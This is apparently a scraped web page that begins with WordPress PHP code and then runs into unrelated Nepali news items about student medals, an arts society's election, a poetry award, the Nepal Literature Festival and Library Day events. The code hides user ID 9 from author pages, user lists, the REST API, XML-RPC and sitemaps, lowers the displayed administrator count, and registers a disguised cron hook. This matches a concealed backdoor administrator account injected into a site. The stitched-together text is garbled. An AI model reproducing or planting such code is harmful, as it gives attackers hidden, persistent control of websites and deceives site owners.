add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
डोल्पा, हुम्ला, बाजुरा र दार्चुला जिल्लाका सर्वश्री सुमित्रा बूढा, सौमती शाही, प्रतीक्षा विष्ट र इशारा कोट्टारीलाई जनही तीसतीस हजार रुपैयाँ राशि सहित ‘नइ कपिल विद्यापदक’ समर्पण गरिएको छ ।
चारै जना छात्रालाई अनलाइनबाट पुरस्कारका राशि प्रदान गरिएको हो । चार दुर्गम जिल्लाका छात्राहरू २०८२ सालका सर्वोत्कृष्ट घोषित भएका हुन् ।
चार जिल्लाका सरकारी स्कुलबाट कक्षा १२ का छात्रामध्ये सर्वोत्कृष्टलाई ‘नइ कपिल विद्या पदक’ प्रदान हुँदै आएको नइ एकेडेमीका सदस्यसचिव नरेन्द्रराज प्रसाईले बताउनु भएको छ । उहाँका अनुसार सर्वोत्कृष्ट घोषित छात्राहरू डोल्पाको आदर्श स्कुल, हुम्लाको मानसरोवर स्कुल, बाजुराको जनप्रकाश स्कुल र दार्चुलाको लटीनाथ स्कुलका रहेका छन् ।
नइ एकेडेमीका सदस्यसचिव प्रसाईले भन्नुभयो, ‘नइ एकेडेमीले २०७९ सालदेखि सुप्रसिद्ध मनोचिकित्सक डा. कपिलदेव उपाध्यायका सम्मानमा बर्षेनी ‘नइ कपिल विद्यापदक’ समर्पण गर्दै आएको छ ।’
कार्यसमितिको उपाध्यक्षमा क्रमशः रमेश उप्रेती, रेजिना उप्रेती र युवराज चौलागाईँ निर्वाचित भएका छन् भने शंकर पाण्डे र राजिन पनेरू महासचिव र सचिव पदमा निर्वाचित भएका छन् । यसैगरी कोषाध्यक्षमा रत्न श्रेष्ठ एवम् सदस्यमा क्रमशः खुमन अधिकारी, एलिना चौहान, पूर्णबहादुर लामा, दिनेश काफ्ले, प्रियङ्का प्रसाईँ, गौतम मानन्धर, सहारा पाण्डे, दीपा रेग्मी पन्त, ऋतु कँडेल र शिवम अधिकारी निर्विरोध निर्वाचित भएका छन् । यसैगरी ग्लोबल सञ्चार प्रतिनिधिका रूपमा सञ्चारकर्मी विष्णु शर्मा चयन भएका छन् ।
निवर्तमान अध्यक्ष एवम् हाल एसिया संयोजकका रूपमा रहेका दयाराम पाण्डेयको अध्यक्षतामा सम्पन्न कार्यक्रमको प्रमुख आतिथ्यता इनास ग्लोबल अध्यक्ष अर्जुनप्रसाद काफ्लेले गरेका थिए । काफ्लेले इनासले विश्वभर छरिएर रहेका नेपालीहरूका कला, साहित्य, संस्कृति, भाषा, खेलकुद जस्ता बहुविध विधालाई समेट्दै सोको प्रबर्धनमा विशेष भूमिका निर्वाह गर्ने र आफ्नो कार्यकालले त्यसका लागि आवश्यक पहल गर्ने जानकारी दिए । काफ्लेले इनासले एनआरएनका दोस्रो-तेस्रो पुस्तालाई नेपाली भाषा सिकाउने गरी नेपाली पाठशालाको स्थापना गर्दै कार्य अगाडि बढाएको समेत जानकारी दिए । यसैगरी सन् २०२५-२०२७ कार्यकालका लागि अध्यक्ष पदमा निर्वाचित लामिछानेले आफू र आफ्नो कार्यसमितिले इनासको विधानको मर्मअनुसार कर्म गर्दै विश्वभर रहेका नेपाली कलाकारको भावनालाई कदर गर्ने गरी आगामी कार्ययोजना तय गर्ने प्रतिबद्धता व्यक्त गरे ।
इनास नेपाल शाखाको वर्तमान कार्यसमितिभित्र चलचित्र, गीत-सङ्गीत, भाषासाहित्य, खेलकुद, कलाकारिता, पत्रकारितालगायत बहुविध विधाका विशेषज्ञहरूको प्रतिनिधित्व रहेको र यसलाई आवश्कताअनुसार थप परिष्कृत एवम् परिमार्जित गर्दै लैजान आफूहरू प्रतिबद्ध रहेको जानकारी एसिया संयोजक एवम् नेपाल शाखाका संस्थापक दयाराम पाण्डेयले दिए । कार्यक्रममा इनासका संरक्षक नीता श्रेष्ठ, ग्लोबल कोषाध्यक्ष रूपा न्यौपानेलगायतले शुभकामना मन्तव्य दिएका थिए ।
इनास विश्वभर छरिएका नेपाली कलाकारको हकहितका पक्षमा काम गर्ने र संसारभरि नेपाली संस्कृति, भाषा, साहित्य, कलाकारिता आदिलाई पुर्याउने गरी सन् २०१२ मा पोल्याण्डमा स्थापना भएको सामाजिक संस्था हो । यसको हालसम्म झण्डै ७३ देशमा आफ्नो शाखा स्थापना भइसकेको छ ।
]]>कार्यक्रमका अध्यक्ष तथा वरिष्ठ साहित्यकार काजी रोशन स्व. रणबहादुर खड्का र स्व. शक्तिबहादुर खड्काको तस्बिरमा माल्यार्पण गर्नुभएको थियो । रोशनले नेपाली साहित्य क्षेत्र विशेष गरी कविता विधामा कवि सरस्वती श्रेष्ठ ‘सरू’ को योगदान उल्लेखनीय रहेको भन्दै उहाँको साहित्यिक सिर्जना र प्रतिभाको उच्च मूल्याङ्कन गर्दै उहाँलाई पुरस्कृत गरिएको बताउनुभयो ।
मध्यनेपाल न. पा. ३, सोतीपसल, लमजुङमा जन्मिएर चालिसको दशकदेखि पोखराबाट नेपाली साहित्यमा निरन्तर लागिरहनुभएकी सरूका ‘थुँगा थुँगा जिन्दगानी’ (गीत सङ्ग्रह), ‘एक झुल्को घाम ओर्लेर सडकमा’ ( कविता सङ्ग्रह), ‘फूलहरुको आँधी’ (कविता सङ्ग्रह), ‘किट्टी’ (बालकथा सङ्ग्रह) प्रकाशित छन् ।
त्यसै गरी कवि सरस्वती श्रेष्ठ ‘सरू’ ले नवकविता प्रतिभा पुरस्कार (२०५३), समता सम्मान, इलाम ( २०५४), गजल प्रतिभा सम्मान (२०६३), धादिङ साहित्य समाज सम्मान (२०६४), नवनीत साहित्य सम्मान (२०६५), जनकल्याण स्रष्टा सम्मान (२०६६), समता काव्य सम्मान (२०६६), बाबा साहित्य साधक पुरस्कार (२०६८), विश्व नारी नेपाली साहित्य सम्मान (२०७१), हाम्रो मझेरी साहित्य प्रतिभा सम्मान (२०७१), जननी अवार्ड (२०७२), श्रष्टा साहित्य चौतारी पुरस्कार (२०७२), समता काव्य सन्ध्या रजत वर्ष सम्मान (२०७४), सुभद्रा अधिकारी प्रतिष्ठान पुरस्कार (२०७६), नारी प्रतिभा वाङ्मय प्रतिष्ठान सम्मान (२०७७), साहित्य शृङ्खला सम्मान (२०७७), राष्ट्रिय सङ्गीतकर्मी सङ्घ सम्मान (२०७७), सप्तरङ्गी साहित्य सम्मान (पोखरा २०७७), झलक(पुष्पा सृजना पुरस्कार (२०७९), नइ रजत महोत्सव पदक (२०७९), नइ कृति रत्न (२०८०), अभिलेख सम्मान (२०८१), गीतकार प्रतिष्ठान सम्मान (२०८१) यसअघि प्राप्त गरिसक्नु भएको छ ।
कार्यक्रममा कमल बोहोरा, सीता नेपाली र नवीन शर्माले शुभकामना मन्तव्य दिनुभएको थियो भने कार्यक्रम सञ्चालन नवराज गौतमले गर्नुभएको थियो ।
]]>

घाटाका बाबजुद पनि नेपाल लिटरेचर फेस्टिभलको बाह्रौँ संस्करण फागुन १५ देखि १८ गतेसम्म पोखरामा हुने भएको छ । आयोजक बुकवर्म फाउन्डेसनले शुक्रबार पोखरामा पत्रकार सम्मेलन गरेर अघिल्ला संस्करण जस्तै यस वर्ष पनि फेवाताल किनारको बाराही घाटमा महोत्सव हुने जानकारी दिएको हो । ‘साहित्यको कुम्भमेला’ मानिने फेस्टिभलको यो संस्करणको मुख्य प्रस्तुतकर्ता एनसेल फाउन्डेसन हो ।
सेसन कक्ष र स्टल तयारीको काम अन्तिम चरणमा पुगेको फेस्टिभलका कार्यकारी निर्देशक नीरज भारीले जानकारी दिए । फेस्टिभलमा ५० भन्दा बढी छलफल सत्र, अन्तरक्रियात्मक कार्यक्रम, साङ्गीतिक प्रस्तुति र अन्य रचनात्मक कार्यक्रम समावेश गरिएका छन् । देश/विदेशका दुई सयभन्दा बढी साहित्यकार, राजनीतिज्ञ, लेखक, कलाकार, सम्पादक, पत्रकारलगायतको उपस्थिति रहने छ । फेस्टिभलमा साहित्यसँग जोडिएका सामाजिक, राजनीतिक, आर्थिक, नवीन प्रविधि, सिनेमालगायत विविध क्षेत्रका विषयमाथि गम्भीर मन्थन हुने छ ।
यसपटक प्राध्यापक तथा अर्थशास्त्री महेन्द्र पी लामाको विद्वत् प्रवचनसँगै फेस्टिभल सुरू हुने कार्यकारी निर्देशक निरज भारीले जानकारी दिए । उनी इन्दिरा गान्धी ओपेन यूनिभर्सिटी (आईजीएओयू)को प्रो–उपकुलपति र भारतको सिक्किम विश्वविद्यालयका संस्थापक उपकुलपतिसमेत हुन् । उनी भारतको राष्ट्रिय केन्द्रीय विश्वविद्यालयको सबैभन्दा कान्छा उपकुलपतिसमेत बनेका थिए ।
विद्वत् प्रवचनलगत्तै अध्यात्म र संघर्षमाथि अभिनेत्री मनीषा कोइराला र पत्रकार विजय कुमारको विशेष संवाद हुनेछ । यसैगरी महानायक राजेश हमालको पुस्तक ‘युगदेखि युगसम्म’को आवरण तथा पुस्ताकांश लोकार्पण पनि विविध विशेष सत्रमध्ये एक हो । हमालको पुस्तक प्रकाशोन्मुख छ ।
फेस्टिभलमा उद्यमी एव लेखक जीवा लामिछानेको बहुप्रतीक्षित पुस्तक ‘अक्षत अन्टार्कटिका’को लोकार्पण हुने आयोजकले जनाएको छ । नेपाली क्रिकेटका ढुकढुकी पारस खड्का हुन् या साहित्यानुरागीबीच चर्चित भूषिता वशिष्ठ, समाजसेवालाई आफ्नो कर्म बनाएका डा. भगवान कोइरालादेखि म्यागी डोएनसम्मको प्रेरणादायी संवाद फेस्टिभलमा रहनेछन् । म्यागी अमेरिकन समाजसेवी हुन् । सुर्खेतस्थित एक बालगृहको सहसंस्थापक उनी सन् २०१५ को सीएनएन हिरो हुन् ।
नेपाली अमेरिकी लेखक रञ्जन अडिगाको सहभागिता फेस्टिभलका दुई सत्रमा रहनेछ । उनको छोटो कथा संग्रह, ‘लिच एण्ड अदर स्टोरीज’माथि उनी र भूषिता वशिष्ठबीच संवाद हुनेछ । उनका कथा र लेखहरू स्टोरी क्वार्टरली, द न्यू योर्क टाइम्स, हफी पोस्ट, द साल्ट लेक ट्रिब्यून, लगायतमा प्रकाशित छन् । उनी वेस्टमिन्स्टर विश्वविद्यालय, साल्ट लेक सिटी र युटामा रचनात्मक लेखनविधि पढाउँछन् ।
फेस्टिभलको यो संस्करणमा दुई फरक पुस्ताका लेखकको पुस्तकमाथि विमर्श हुनेछ । अग्रज वामपन्थी नेता एवम् नेकपा मसालका महामन्त्री मोहनविक्रम सिंहद्वारा लिखित उपन्यास ‘कामरेड जलजला’माथि विमर्श हुने र ६ वर्षीय भूमिलक्ष्मी पराजुलीको ‘मरमेड, ह्वेल एन्ड प्रिन्सेस’ नामक चित्रकथा पुस्तक सार्वजनिक गरिने फेस्टिभलका निर्देशक अजित बरालले जानकारी दिए । ८९ वर्षीय सिंहको एक हजार ३२० पृष्ठको उपन्यास नेपालमा प्रकाशित सबैभन्दा ठुलो पुस्तक भएको बताइन्छ ।
परम्परागत धुनदेखि पपसम्म वा यी दुवै विधाका सङ्गीतको मिश्रणले फेस्टिभलका साँझहरूलाई संगीतमय बनाउनेछ । साङ्गीतिक कार्यक्रमहरूमा प्रोजेक्ट सारङ्गीअन्तर्गत किरण नेपालीको नेतृत्वमा सामूहिक प्रस्तुति हुनेछ । त्यस्तै नेपाली सङ्गीतका पप–सम्राटका रूपमा परिचित ओमविक्रम विष्टले पनि फेस्टिभललाई गुञ्जायमान बनाउनेछन् ।
परम्परागत धुन र लयहरूलाई समकालीन परिवेश सुहाउँदो स्वरूप दिने साङ्गीतिक समूह ‘सोनागी ब्लुज’ले पनि फेस्टिभलमा प्रस्तुति दिनेछ । काठमाडौँ विश्वविद्यालयको संगीत विभागका विद्यार्थीहरूको सामूहिक परियोजनाका रूपमा सुरु भएको यस ब्यान्डको संगीतमा नेपाली लोक, रक र भारतीय शास्त्रीय सङ्गीतको समिश्रण सुन्न सकिन्छ ।
सिर्जनाको अर्को विधा चित्रकलालाई यस वर्ष पनि प्राथमिकता दिइएको कार्यकारी निर्देशक भारीले सुनाए । यस संस्करणमा परम्परागत पौभा चित्रका विश्व प्रसिद्ध कलाकार लोक चित्रकारका चित्र प्रदर्शनीमा राखिने उनले जानकारी दिए ।
विश्वप्रसिद्ध भारतीय लेखक शशि थरूरको पुस्तक ‘ह्वाई आई एम अ हिन्दू’को नेपाली संस्करण लोकार्पणसँगै फेस्टिभलको समापन हुने छ । भारतीय राजनीति, इतिहास र अन्तर्राष्ट्रिय सम्बन्धका विश्लेषक तथा चर्चित लेखक थरूरका कैयौं पुस्तकले विश्वव्यापी चर्चा पाएका छन् ।
शुक्रबार पोखरामा आयोजित पत्रकार सम्मेलनमा बोल्दै फेस्टिभलका निर्देशक अजित बरालले सन् २०११ देखि नेपाल लिटरेचर फेस्टिभलको आयोजनापछि नेपालमा वार्षिक रूपमा दर्जनौं साहित्यिक महोत्सव हुन थालेको र यो निकै खुसीको कुरा भएको बताए । ‘सुर्खेत, काठमाडौँ, पोखरा, धादिङ, काँकडभिट्टा, विराटनगर र टीकापुरमा साहित्य र विचारका महोत्सव गरिँदै छन्,’ उनले भने, ‘यस्ता फेस्टिभलले ‘पब्लिक डिस्कोर्स’लाई बलियो बनाएका छन् । यसको श्रेय नेपाल लिटरेचर फेस्टिभललाई जान्छ ।’
एनसेलकी इन्टेरिम मार्केटिङ, कम्युनिकेसन एन्ड सस्टेनेबिलिटी डाइरेक्टर विशाखालक्ष्मी खड्काले सञ्चारको क्षेत्रबाट मात्र नभई कला र साहित्यबाट पनि आफूहरू समाजसँग जोडिएको बताइन् । कला–संस्कृति र साहित्य समाजको धरोहर भएको र एनसेल फाउन्डेसनमार्फत फेस्टिभलसँग १० वर्षपछि फेरि आबद्ध हुन पाएकोमा उनले खुसी व्यक्त गरिन् । ‘कला, साहित्य र संस्कृति हाम्रा धरोहर हुन् । यिनको जगेर्ना गर्नु सबैको जिम्मेवारी हो । नेपाल लिटरेचर फेस्टिभलका सुरुका वर्षहरुमा हाम्रो सहयात्रा एकदमै राम्रो रह्यो । एक दशकपछि पुनः सहकार्य गर्न पाएकोमा हामी अत्यन्तै हर्षित छौं ।’ एनसेल फाउन्डेसनले सञ्चार, प्रविधि, शिक्षा, स्वास्थ्य, वातावरण, कला, संस्कृतिलगायत क्षेत्रमा २ अर्ब रूपैयाँभन्दा बढी लगानी गरेको उनले जानकारी दिइन् ।
फेस्टिभल आयोजक सदस्य एवम् पत्रकार केशवशरण लामिछानेले साहित्य र नेपाल लिटरेचर फेस्टिभलको महत्वबारे चर्चा गरे । साहित्यले समाजमा पुर्याएका योगदानहरूका उदाहरण दिँदै उनले भने, ‘साहित्यले सामाजिक न्यायको क्षेत्रमा, मूल्य र मान्यता भत्काउने र निर्माण गर्ने काममा सघन भूमिका खेलेको हुन्छ । सँगै यसले अल्पसङ्ख्यक, पिछडिएका वर्गलगायतको भाषा, बोली, पिँधको आवाज र रोदनलाई मूलधारको मुद्दा बनाउने काम पनि गर्छ । नेपाली समाज पनि अझ बढी सहिष्णु, सहानुभूतिपूर्ण, स्वतन्त्रतावादी र सभ्य बनोस् भन्ने हाम्रो चाहना छ । त्यही कार्यलाई टेवा पुर्याउन नै नेपाल लिटरेचर फेस्टिभल आयोजना गरिएको हो ।’
फेस्टिभल आयोजक सदस्य एवं पत्रकार भरत कोइरालाले इभेन्टहरूको सहर पोखरामा बर्सेनि हुँदै आएको लिटरेचर फेस्टिभलले सहरको संस्कृति र सभ्यता निर्माण थप योगदान पुर्याएको विश्वास व्यक्त गरे ।
फेस्टिभलको उद्घाटन सञ्चार तथा सूचना प्रविधि मन्त्री पृथ्वीसुब्बा गुरुङले गर्ने छन् । फेस्टिभललाई बुद्ध एयरले संवर्धन गरेको छ । पोखरा महानगरपालिका प्रवर्धक रहेको फेस्टिभलमा गण्डकी प्रदेश सरकार सहप्रवर्धक छ । त्यस्तै उप–प्रवर्धकका रूपमा नेपाल पर्यटन बोर्ड, कृषि विकास बैङ्क, ग्लोबल आइएमई बैङ्क र प्रभु बैङ्कले आयोजकलाई साथ दिएका छन् ।
]]>
विमोचित कृतिका बारेमा सरोज दवाडीले समीक्षात्मक टिप्पणी प्रस्तुत गरेका थिए । उनले यस कृतिमा प्रयोग भएको भाषा र शैलीको प्रशंसा गरेका थिए । त्यस्तै कवि सुरेन्द्र अस्तफलले कृतिका बारेमा पाठकीय टिप्पणी गरेका थिए । एल् बी क्षेत्रीले यो कृति समीक्षा हो कि समालोचना भन्ने प्रश्न उठाएका थिए ।
उक्त कार्यक्रममा समालोचक एकनारायण पौडेलले निसमालोचना के हो ? समालोचना र निसमालोचनाको अन्तर के हो ? भन्ने कुरामा प्रकाश पार्दै उक्त कृतिका बारेमा छोटो टिप्पणी गरेका थिए ।
प्रमुख अतिथिको भूमिकामा रहेका कवि प्रकाश चापागाईंले आफू कवि भएको कुरा गर्दै समालोचनामा त्यति रुचि नभएको कुरा गरे । कृतिकार रमेश प्रभातले आजको समालोचना पाठकमैत्री नभएको हुनाले निसमालोचना लेख्नुपरेको कुरा गरे । यसमा सिर्जनाको सुवास हुने कुरा पनि प्रस्ट पारे ।
सम्पूर्ण किताब नारायणगढले आयोजना गरेको उक्त कार्यक्रमको सभापतित्व कवि एवम् निबन्धकार सृजन लम्सालले गरेका थिए भने सहजीकरण लेखराम सापकोटाले गरेका थिए ।
]]>
सोसाइटीका अध्यक्ष रुपिन्द्र प्रभावीको अध्यक्षतामा भएको कार्यक्रममा सोसाइटीका सदस्य खिम लामिछाने ‘काजी’ले पुस्तकालय दिवसको महत्त्वमाथि प्रकाश पारेका थिए । पुस्तक आदानप्रदानको सुरुवात संस्थापक गनेस पौडेलले गरेका थिए । यसै बिच नवगठित कार्यसमितिका पदाधिकारीहरूलाई निवर्तमान अध्यक्ष केशवशरण लामिछाने र संस्थापक गनेस पौडेलल पदस्थापन गराएका थिए । समितिका अध्यक्षमा रुपिन्द्र प्रभावी, उपाध्यक्ष गौरी तमु र अनुपमणि अधिकारी, सचिव नेपालप्रकाश अधिकारी, कोषाध्यक्ष ध्रव केसी र सहसचिव दीपक पराजुली रहेका छन् । सदस्यहरूमा बाबुराम सुवेदी, बाबुराम सुवेदी, विष्णु सुवेदी, रामजीप्रसाद आचार्य, अमृत सुवेदी, दुर्गा राना, एलिसा विक, रत्नाकुमारी विश्वकर्मा र खिम लामिछाने `काजी´ रहेका छन् । समितिको सल्लाहकारमा गनेस पौडेल, उपेन्द्र पौडेल र केशवशरण लामिछाने छन् भने पुस्तक छनोट समितिमा केशवशरण लामिछानेको संयोजकत्वमा विजय भण्डारी र हसिना बस्नेत रहेका छन् ।
सोसाइटीले पुस्तक दिवस र पुस्तकालय दिवसमा पुस्तक आदानप्रदानलगायतका कार्यक्रम सञ्चालन गर्दै आएको छ । आफ्नो पहिलो मासिक नियमित कार्यक्रम आगामी भदौ ३० गते शनिबार पोखरा उद्योग वाणिज्य सङ्घको अमृत कक्षमा डा. नवराज केसीको कृति ‘शून्यको मूल्य’ माथि परिचर्चा गर्ने सोसाइटीले जनाएको छ ।
]]>१६ औँ राष्ट्रिय पुस्तकालय दिवसको सन्दर्भ पारेर आयोजना गरिएको प्रतियोगितामा १६ विद्यालयका ३० प्रतियोगीले भाग लिएका थिए । प्रतियोगितामा सैनिक आवासीय महाविद्यालय, तेघरीकी पुष्पा रोकाया र दुर्गालक्ष्मी नमुना माविकी भूमिका भट्ट क्रमशः द्वितीय र तृतीय तथा कैलाली मोडेल स्कुल, धनगढीकी प्राश्ना सुवेदी र अक्सफोर्ड मावि, धनगढीका प्रदिप नेपाली सान्त्वना भए ।
पुस्तकालयका अध्यक्ष टिएन जोशीको अध्यक्षतामा भएको कार्यक्रममा प्रमुख अतिथि सुदूरपश्चिम प्रदेशका पूर्व सामाजिक विकास राज्यमन्त्री टेकबहादुर रैकाले पुस्तकालयले असल संस्कार र शिक्षा प्रवाह गरिरहेको भन्दै खुसी व्यक्त गरे । अध्यक्ष जोशीले कैलाली जनपुस्तकालयलाई सुदूरपश्चिमकै स्मार्ट लाइब्रेरीका रूपमा विकास गर्ने गरी अघि बढेको जानकारी दिए ।
कार्यक्रम संयोजक हर्क बोहराले पठन संस्कृतिको विकास गर्न यस्ता सिर्जनात्मक कार्यक्रमहरू गरिनुपर्नेमा जोड दिए । विजेताहरूलाई पुस्तकालय दिवस मूल समारोहका अवसरमा भदौ १५ गते पुरस्कार प्रदान गरिने जानकारी संयोजक बोहराले दिए ।
]]>